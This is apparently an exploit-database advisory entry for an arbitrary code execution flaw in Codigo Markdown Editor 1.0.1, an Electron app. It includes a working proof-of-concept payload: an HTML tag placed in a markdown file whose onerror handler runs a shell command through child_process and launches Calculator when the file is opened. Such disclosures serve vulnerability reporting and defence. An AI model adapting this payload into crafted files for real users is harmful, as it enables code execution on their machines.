vendor:
Codigo Markdown Editor
by:
8bitsec
7.5
CVSS
HIGH
Arbitrary Code Execution
CWE
Product Name: Codigo Markdown Editor
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Mac OS 13
2023
Codigo Markdown Editor v1.0.1 (Electron) – Arbitrary Code Execution
A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a user to execute arbitrary code by opening a specially crafted file. Create a markdown file (.md) in any text editor and write the following payload: <video><source onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());"> Opening the file in Codigo will auto execute the Calculator application.